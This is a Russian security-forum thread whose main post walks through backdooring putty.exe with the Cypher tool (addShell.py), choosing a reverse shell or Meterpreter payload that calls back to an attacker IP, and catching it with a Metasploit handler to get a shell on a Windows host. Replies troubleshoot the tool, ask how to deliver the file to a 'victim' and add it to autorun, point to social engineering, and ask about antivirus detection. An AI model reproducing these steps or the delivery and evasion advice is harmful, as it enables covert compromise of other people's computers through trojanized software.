• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Взлом Windows PC - Cypher

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.

upload_2016-12-10_21-57-36.png


В качестве атакующей системы будет использоваться OS Kali Linux,

upload_2016-12-10_21-57-52.png


в качестве целевой системы Windows 8.1 с актуальными обновлениями.

upload_2016-12-10_21-58-7.png


Итак, вернемся к Cypher, скачиваем ее с Github:

> git clone https://github.com/xan7r/cypher

upload_2016-12-10_21-58-32.png


Выполняем следующие команды:

> cd cypher

> chmod a+x addShell.py

> ls –a

Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.

upload_2016-12-10_21-59-26.png



Теперь выполним следующую команду:

> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0

upload_2016-12-10_21-59-50.png


В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.

· 0 – windows/shell_reverse_tcp

· 1 – windows/meterpreter/reverse_http

· 2 – windows/meterpreter/reverse_http +PrependMigrate

· 3 – windows/meterpreter/reverse_https

· 4 – windows/meterpreter/reverse_https +PrependMigrate

По итогу получаем файл putty_evil.exe в папке с Cypher.

upload_2016-12-10_22-0-26.png


Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit
upload_2016-12-10_22-1-3.png


Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.

upload_2016-12-10_22-1-46.png


Сменим кодировку командой:

> chcp 65001

upload_2016-12-10_22-2-9.png


Посмотрим подробную информацию о системе:

> systeminfo


upload_2016-12-10_22-2-36.png


Это все. Спасибо за внимание.
 
M

mafiasepa

set LHOST 192.168.0.107(это свой ip или тест машины)?
 
M

Mixa

Всьо получилось. Мой первый "В*ЛоМ \ пронИкновение !!!" Вот только с передачей ехе. я намучялся. Посоветуйте как бы его так передать и в авторун чтоли закинуть жертве...)
 
  • Нравится
Реакции: Darwin_Douglas

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Win XP Sp3 =)

8843748.png


После активации секунды две и ошибка, за эти секунды успевает только начать коннект (как видно на скрине внизу) =)
 
  • Нравится
Реакции: Vander
D

Darwin_Douglas

Как я понял,сложность состоит в том, что мне нужно доставить файл putty_evil.exe на целевую машину вручную или каким-нибудь другим способом и запустить.
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Как я понял,сложность состоит в том, что мне нужно доставить файл putty_evil.exe на целевую машину вручную или каким-нибудь другим способом и запустить.

Если внимательно почитать форум и темы про социальную инженерию, сложностью это не станет. Запуск прриложения дело времени - если файло было скачано, то явно будет и запущено.
 
S

sdfsd

а как всплывающее окошко которое типа по закрытию хавает PS cделать
 

Runinterface

Green Team
24.10.2016
51
41
BIT
0
[*] Sending stage (957487 bytes) to 192.168.1.153
c 10ки пробую.
Вот такое сообщение прилетает и все более ничего не происходит в чем может быть трабл?
 
O

Ow11

Почему выходит ошибка?


File "./addShell.py", line 28
print "\n[*] Backdoor shell was succesfully added to file!"
^
SyntaxError: Missing parentheses in call to 'print'
 

BarDimNik

Green Team
23.09.2016
28
16
BIT
0
Здравствуйте! При создании пэйлоада получаю вот такое сообщение:
пользователь@pc:~/.pentest/cypher$ sudo ./addShell.py -f putty.exe -H 192.168.1.105 -P 4444 -p 0
Traceback (most recent call last):
File "./addShell.py", line 2, in <module>
import random, optparse, pefile, capstone, binascii, struct, os
File "/usr/local/lib/python2.7/dist-packages/capstone/__init__.py", line 230, in <module>
raise ImportError("ERROR: fail to load the dynamic library.")
ImportError: ERROR: fail to load the dynamic library.
Подскажите, пожалуйста, чего ему не хватает?
 
O

Ow11

Здравствуйте! При создании пэйлоада получаю вот такое сообщение:
пользователь@pc:~/.pentest/cypher$ sudo ./addShell.py -f putty.exe -H 192.168.1.105 -P 4444 -p 0
Traceback (most recent call last):
File "./addShell.py", line 2, in <module>
import random, optparse, pefile, capstone, binascii, struct, os
File "/usr/local/lib/python2.7/dist-packages/capstone/__init__.py", line 230, in <module>
raise ImportError("ERROR: fail to load the dynamic library.")
ImportError: ERROR: fail to load the dynamic library.
Подскажите, пожалуйста, чего ему не хватает?

Ответ уже содержиться в вопросе, не хватает динамической библиотеки, судя по ошибке.
У вас Python 2.7, установите 3 версию и проблема должна исчезнуть!
Только потом не забудьте запускать именно с 3 версией, тоесть sudo python3 ./addShell.py -f putty.exe и.т.д
 
  • Нравится
Реакции: BarDimNik и Vander

woolf1514

Green Team
06.03.2017
181
191
BIT
1
Так это джойнер получается. Как у него в целом с палевностью? Есть возможность проверить твой готовый файл, к примеру, на ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!